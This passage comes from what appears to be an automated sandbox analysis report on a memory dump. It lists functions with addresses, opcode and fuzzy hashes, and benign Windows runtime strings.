Instruction Fuzzy Hash: 6E9190316043429FE729CE29C941B2BBBE5AF84728F14893DFA95CB284E775E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012D51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

Legacy, xrefs: 012D5226
UEFI, xrefs: 012D521D

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ea1cb0194a239a7977851fa04bcceecb14dde3be340ee9f8b0e3757f86e7b6be
Instruction ID: 72b95bc59558fcac104ae953dec07644b3ddd7002464953fc4d95a53ca3962e5
Opcode Fuzzy Hash: ea1cb0194a239a7977851fa04bcceecb14dde3be340ee9f8b0e3757f86e7b6be
Instruction Fuzzy Hash: EB516EB1A647099FDB25DFA8C840AAEBBF8FF58700F14402DE649EB251DAB1D940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0125B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 012B48AD

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 01c7ee8c959f711839dd3f1b221cb339848e770b6a36f49b76915cfb95f6748a
Instruction ID: 6df5d58ace32ba80efd00ad9eb2c1e709e4b72255718c00819b305f413ddb9ec
Opcode Fuzzy Hash: 01c7ee8c959f711839dd3f1b221cb339848e770b6a36f49b76915cfb95f6748a
Instruction Fuzzy Hash: 6551D271D2029A8FDF25DF68C8C5BFEBBB1AF00750F1041A9D95A9B283D7704941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0127B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0127B9A5

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 3e002e1bb2a98363d9c0c88d231c536f1258f0b6de19882318664df48426f74e
Instruction ID: 8f162dd5fb29c88f307f4e37938e8a8ba245c515a0f63b279df0a9d7a4b538a1
Opcode Fuzzy Hash: 3e002e1bb2a98363d9c0c88d231c536f1258f0b6de19882318664df48426f74e
Instruction Fuzzy Hash: 51514C71628342CFC721EF6DC08092BBBE5FB88610F14496EFA9587355DB71E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01282581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 01282642, 01282691

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 869e631be174b36c791d5ba1edefc38bd9682bec7b48b478bea5a92bd3c99e51
Instruction ID: 81b487455955d6f5b5cc792dbf5d579726228f3a19507b2f0664b92b33a36acd
Opcode Fuzzy Hash: 869e631be174b36c791d5ba1edefc38bd9682bec7b48b478bea5a92bd3c99e51
Instruction Fuzzy Hash: 30C1A275E21216DFDB24EF99D881ABDBBB5FF48700F444029E901BB290E774A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0128FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 012CBE0F

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 7d2c95ad6f47fa5995e309a5e17a2fdc801da3254fa197a6399ffe79128918ec
Instruction ID: 03239c9da678499dc0be21b04b3935ab7649d74d69ba931a3ba6c61ba2b37eff
Opcode Fuzzy Hash: 7d2c95ad6f47fa5995e309a5e17a2fdc801da3254fa197a6399ffe79128918ec
Instruction Fuzzy Hash: 15A10531B316078BEB25EF68C55177AB7A4AF48B50F04466DEB06CB6C0EB30D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01252D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 012AFA4A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 6dcbd11b4e642617cd8bc2c2cef55104536b2d81e6af1e93724d42403b76b7cd
Instruction ID: 80ed421dfb6469d054c1b674af6021357b8254af2bba9e5b06dd15be1be43692
Opcode Fuzzy Hash: 6dcbd11b4e642617cd8bc2c2cef55104536b2d81e6af1e93724d42403b76b7cd
Instruction Fuzzy Hash: EA615631A20646DFEB32DF6CC994BBE7BE4EB44314F540269DA11972C2D778AD41C781

Uniqueness

Uniqueness Score: -1.00%

Function 01320EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01320F16

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 03d95859b62c338efa652004966e2dbfb40cb0d628533d79193d85bc8e54e737
Instruction ID: 1b1d5a601b0ede00f2de8562011469fac6176e48fe4497cf5a7741064964ca17
Opcode Fuzzy Hash: 03d95859b62c338efa652004966e2dbfb40cb0d628533d79193d85bc8e54e737
Instruction Fuzzy Hash: DF5191713043929FD325EF28D984F1BBBE9EBC4718F04492CFA5697291D674E809C761

Uniqueness

Uniqueness Score: -1.00%

Function 0128F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 0128F124

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: d1410d9ecee235613d99c13060a06c4a8cd74d540ab5a0d163c16ac58dc3a7ba
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: C851A071515711AFC320DF19C841A6BBBF8FF58750F008A2DFA9587690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012D3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 012D358F

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 01c4272116991bab01d4ad152cc1b19295325ffde3f3218908ee74decb3f097a
Instruction ID: 676a6773b92cd733daf25690650350e9feb68dd5ec454ba32b7c65f4edfd0001
Opcode Fuzzy Hash: 01c4272116991bab01d4ad152cc1b19295325ffde3f3218908ee74decb3f097a
Instruction Fuzzy Hash: F9413FF291052DAFDF21DA54CC84FAEB77CAB54714F0045A5AA09AB240DB309E88CF99

Uniqueness

Uniqueness Score: -1.00%

Function 013205AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01320633

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 9bf6810c7108b78443bd99aa569f836cdd1cc4b3534168815f4f1424269a0dd8
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 2731F5327043566BE724EE28CD45F9B7BD9EBC4768F144229FA54EB280D770E908C791

Uniqueness

Uniqueness Score: -1.00%

Function 012D3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 012D38B4

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: c13bcd7a2e52f8ed729bfc1265aa0e37cfe2d0c562a5b9e26ef3b22749e5cc57
Instruction ID: 63d099dc5d2bb31bdd16e7f8a977a9cc2159055f906cdb8fe888eb5a3b49ae1c
Opcode Fuzzy Hash: c13bcd7a2e52f8ed729bfc1265aa0e37cfe2d0c562a5b9e26ef3b22749e5cc57
Instruction Fuzzy Hash: E831E3B2D1151AAFEB15DB5CC946EBFBB74FB80B20F014169EA14A7290D7309E00C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0128D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0128D303

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f84d5358a9f9b4d58c9692562b3fc0c861a6cc3ec57f4064cf7924869bc5a066
Instruction ID: 31e36de32072d0daf96b2a7290d0d3cd92a263b85c4f38229acd46a8b74ee121
Opcode Fuzzy Hash: f84d5358a9f9b4d58c9692562b3fc0c861a6cc3ec57f4064cf7924869bc5a066
Instruction Fuzzy Hash: F731C4B156930A9FC711EF6CC88196BBBE8FF95654F00092EF99493290D634DD08CF92

Uniqueness

Uniqueness Score: -1.00%

Function 01261B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01261BC5

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: a8b2a0c48bb521637effceb19c8b8c7fc8eb58f50d6e973725339fbbd5cdcc45
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: A4210A3652161AABDB229A5DC880FAFBB6DEFC1B50F054426FF048B244D630EC50D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0127F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 0127F73F

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 31cec6c88b8de48cd56d5b28c5d9bd38992ddee8170d074eb08b5d5690314745
Instruction ID: 511e4076cbfb1889cd7fd3ce3b2e92c1b4912ede0e88c50c1c732dc5d3e61548
Opcode Fuzzy Hash: 31cec6c88b8de48cd56d5b28c5d9bd38992ddee8170d074eb08b5d5690314745
Instruction Fuzzy Hash: 7811B23533C7138BEB2D4E1D8B92737F695AB85624F24452AE675CB391DBB0C840C740

Uniqueness

Uniqueness Score: -1.00%

Function 01308DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 01308E21

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 0e398129d6cdaf739e13aaf22110656d924e4430787df51a1931ac62de27af20
Instruction ID: e2558f96ea473768d4a6486263b50154894c46ae7b157d2038ba0108e7a7882b
Opcode Fuzzy Hash: 0e398129d6cdaf739e13aaf22110656d924e4430787df51a1931ac62de27af20
Instruction Fuzzy Hash: E8113975D65348DBDF29CFA889157ADBBF0AB14318F20429ED5296B682C3340A01CF14

Uniqueness

Uniqueness Score: -1.00%

Function 012EFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 012EFF60

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 0e182484cdc190f74134b935e14a0ac0bc819afca4fa92aa5af7b3af8d6e4d6b
Instruction ID: 733dad3c35e9cf39f40116a15931ed62dbb2f53d0506af00f20ff4a61877d2e9
Opcode Fuzzy Hash: 0e182484cdc190f74134b935e14a0ac0bc819afca4fa92aa5af7b3af8d6e4d6b
Instruction Fuzzy Hash: BD11A175970149EFDF26EF94CA48FA8BBF1BB04704F958054E208576A1CB799940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01325BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b3bde7f8daa66dd2949a9c7b3cb5ec5e7789afad672c735108a1ea2ae09a005
Instruction ID: 8d619c1b75e5abb98ce10d367b8a195ae99234622662232c4364197ce58d4dbf
Opcode Fuzzy Hash: 5b3bde7f8daa66dd2949a9c7b3cb5ec5e7789afad672c735108a1ea2ae09a005
Instruction Fuzzy Hash: 36426FB5D10229CFDB24DF68C881BA9BBB1FF45308F1481AAD94DEB252D7349A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01274120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2675498e4f07fd81df62f47d48ea87564915f18c07862482b31797bc243e7308
Instruction ID: e056a612c5440e056775d871ced75fce6c170584de0973c6179757799dc04473
Opcode Fuzzy Hash: 2675498e4f07fd81df62f47d48ea87564915f18c07862482b31797bc243e7308
Instruction Fuzzy Hash: DAF1B0706282928FC724EF18C491ABBB7E1FF98744F15492EF585CB250E734D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012820A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f744e22e3e4e6989dbfb54f6aad98cb789b03078b20b4127ec945c46c17d96
Instruction ID: 67410b2e6c61a3f4e3daae60c9ca176ae761980a294af94d86e8858be38a5e5f
Opcode Fuzzy Hash: f3f744e22e3e4e6989dbfb54f6aad98cb789b03078b20b4127ec945c46c17d96
Instruction Fuzzy Hash: DDF12334629302DFEB26DF2CC44076A7BE5AF85724F14865DEB998B2C1D774E841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0126D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc56f557c719a4b9de4e3bc49d84493dc55f5e20fb3e79bb9ebf077041234c9
Instruction ID: a42e0a00874b0ac7668ab9e4b7688403fa2f979ceab37d4a9d5c303aa5576371
Opcode Fuzzy Hash: cbc56f557c719a4b9de4e3bc49d84493dc55f5e20fb3e79bb9ebf077041234c9
Instruction Fuzzy Hash: 41E1E034B2125ECFEB25CF68C884BB9B7B9BF45304F0401A9DA49972D0DB74AD81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0126849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0fd4c2faca6d3b21f49054d8623a230f4b56fff95d6fce102c376b5a55cf38
Instruction ID: deadefe22e28e0cc786a2c552fcf9fd4684fe8f9a8cedeeea2abdd114d1ca117
Opcode Fuzzy Hash: de0fd4c2faca6d3b21f49054d8623a230f4b56fff95d6fce102c376b5a55cf38
Instruction Fuzzy Hash: 1FB12FB4E2034ADFDF15DF99C984AADBBB9FF48304F104129E605AB285DB70AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0128513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b84c22167fea6b35bc0cd1e60e4d9c6383b7232ddb6dc6f53f177b58be15833
Instruction ID: e41db42ef6db41bc9d5e0b1618f20b4d1409c2aadbe3366a22b08836d63ad3fe
Opcode Fuzzy Hash: 1b84c22167fea6b35bc0cd1e60e4d9c6383b7232ddb6dc6f53f177b58be15833
Instruction Fuzzy Hash: 6AC122755193818FD354CF28C580A6AFBF1BF88704F184A6EFA998B392D771E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 012803E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075a06d1600a2d88349458c890c5b25ec7f41f42a27523f84ce5286f7f739f4d
Instruction ID: cffdd5f5bca9a1d8485dfa448a4f4a464298347ea0f1c0eb768e6ec408eab440
Opcode Fuzzy Hash: 075a06d1600a2d88349458c890c5b25ec7f41f42a27523f84ce5286f7f739f4d
Instruction Fuzzy Hash: 35914531E216569FEB31BA6CC854BBE7BA4EB00B24F050369FB10AB2D1DB749D04C795

Uniqueness

Uniqueness Score: -1.00%

Function 0125C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc1c75955dda3497880aa580c6ccd8d1562c384b92e4ef5398677b50eee8d94
Instruction ID: f93baa77b858d0bc04765e80cfcf1ca658002622b87055915f53e8d2d5472b7f
Opcode Fuzzy Hash: dcc1c75955dda3497880aa580c6ccd8d1562c384b92e4ef5398677b50eee8d94
Instruction Fuzzy Hash: B78194756642429FDB26CE58C881A7BB7E8FB84B50F14461EEF459B241E330ED41CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 012EB8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e02bdcaefd40f0cc50c5086f3b67b7e25e6bf3525d6f00a50797ad637c5dfd
Instruction ID: a09b9a582bf86e56f06b7fba6d11e87f9dee4db9df50e389db1771f94f4d1612
Opcode Fuzzy Hash: 60e02bdcaefd40f0cc50c5086f3b67b7e25e6bf3525d6f00a50797ad637c5dfd
Instruction Fuzzy Hash: 7E710132260702EFEB32DF19C849F66BBE5EB44721F54452CEB55872A0DBB0E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012D6DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 2e7a378be9cb753a4cbbb960261e0686a984567a2d6d17fad40f0effb84f8038
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 76716F71A1061AEFDB10DFA9C984EEEBBB9FF48714F104469E505E7290DB34EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012552A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8b65a6b871679ca698016f3b69651e6dc8327700a75e312924228fdf19b68b
Instruction ID: 4e13984136a3965a1a4ef8dea79f522d639a142803e7a8989469b8a1f50fb6c7
Opcode Fuzzy Hash: 5b8b65a6b871679ca698016f3b69651e6dc8327700a75e312924228fdf19b68b
Instruction Fuzzy Hash: 3751DE30225342AFDB22EF68C881B27BBE8FF50754F14091EF99587691E770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01282AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58cca7e29ecdbf621eb5b0d61389f08b43ce644ae1e81b5632ac2e67f10ce62c
Instruction ID: a32580aae8145e5e087580314c1a66b53faf817e06dae676be670c76e5001f83
Opcode Fuzzy Hash: 58cca7e29ecdbf621eb5b0d61389f08b43ce644ae1e81b5632ac2e67f10ce62c
Instruction Fuzzy Hash: 7B51F6B6B22115CFCB14EF5CC491ABDB7F5FB88700705845AE946AB395E730AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0131AE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c991323b4cea5f66608f43ce064c350ccca044a01bbe5889135cb2fad6419262
Instruction ID: 50a82a66e159eefcce1419bb0dabb533bac0c7d7cead577b34bb6115b7bbd9d3
Opcode Fuzzy Hash: c991323b4cea5f66608f43ce064c350ccca044a01bbe5889135cb2fad6419262
Instruction Fuzzy Hash: 2C4119717062915BD72ECA2DCC84B3FB79AEF84619F044218F91AC72D8D734D805C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0127DBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2dea943c206635a85c2b4e52d99a65757ee484c71484568c50f85b130cf764
Instruction ID: 077125fdd87a743f838d3213dfa3ada2e6e27a0b2b125b9fa9fd8c4094e7e686
Opcode Fuzzy Hash: cf2dea943c206635a85c2b4e52d99a65757ee484c71484568c50f85b130cf764
Instruction Fuzzy Hash: 7A51C076A1021ACFCB14DFACC480AAEFBF5BF48310F20815ADA55A7340EB71A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0126EF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: e40405930c9900cd3c8f3bd6337b66bae4a60fa190da8aa98f1ffeaa295c4b86
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 74510530A24246EFDF21CB68D2D17AEBBB5AF05314F1481A8CA45532C6D3B5A9C9C781

Uniqueness

Uniqueness Score: -1.00%

Function 0132740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: a689fcb77e9e17216cd6e55f9f935d101fe77145e63361550625a0c0338a2bb8
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: D2518D71600646EFDB16DF18C580A96FBB5FF55308F24C1AAE908DF212E371E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01282990, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965d73379e96319d0035946ca5c429018f8a2e98d1d3ecefce02401a977de415
Instruction ID: 621432b0fcac98ea2b6bbd9d25caa978b63a2cedd5a3283da6f6da17b891e271
Opcode Fuzzy Hash: 965d73379e96319d0035946ca5c429018f8a2e98d1d3ecefce02401a977de415
Instruction Fuzzy Hash: B9518C71A2120ADFDF25EF98C840AEEBBB5BF18710F118115EA00AB2A1C375D952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01284BAD, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd65b65a3ad2caa7f021bae341289f73739072415469407fdb346f627b8d81c
Instruction ID: 2f8a7c055721a51eec87edfb8e11bc1471dcfd87c55a874a0daf64b001547c0c
Opcode Fuzzy Hash: 4bd65b65a3ad2caa7f021bae341289f73739072415469407fdb346f627b8d81c
Instruction Fuzzy Hash: BB41CA35A2125A9FDF21EF68C940FEA77B8EF45700F0105A9EA08AB341D774DE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01284D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09753b9f032081d9eb50e1fd5e85107cbdfd9ca4bc502b135022155a297dcba0
Instruction ID: df5984a4707ed886b8b353b511b5ad7638fd85db8bfe4e5a6d4b65bcafa0d5a7
Opcode Fuzzy Hash: 09753b9f032081d9eb50e1fd5e85107cbdfd9ca4bc502b135022155a297dcba0
Instruction Fuzzy Hash: E841E471A6135A9FEB31FF18CC81F66B7A9EB14714F040099EA45972C1D7B0ED40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0131AA16, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 0980d0d768ab51bbeb0f3eb8c3afff64030d58a2de796b8ba1a22bc05cdbdb81
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: AC312432F021C96BEB198BA9C944BBFFBBAEF84216F058469E901A7245DA749D00C650

Uniqueness

Uniqueness Score: -1.00%

Function 01268A0A, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38863d8e190724ef56551b901cba152e40d041f9f057e8987996d8ff6e24ec3c
Instruction ID: 45da4b12761a521c7a71628c98e98a02139ef9ed62a7ba16bdfa7945dc5e3765
Opcode Fuzzy Hash: 38863d8e190724ef56551b901cba152e40d041f9f057e8987996d8ff6e24ec3c
Instruction Fuzzy Hash: 79415FB5A503299BDB24DF59C888AB9B7F8FB54300F1045EAD919D7292EB709EC0CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0131FDE2, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 10a8f8e544cf48b5cd439f498af408bb889637e0363bb0962accbcbd4a70e601
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: DC315B32300A446FD72A977CC844F6BBBEEEBC5658F084158E9498B74ADB70DC05C760

Uniqueness

Uniqueness Score: -1.00%

Function 0131EA55, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
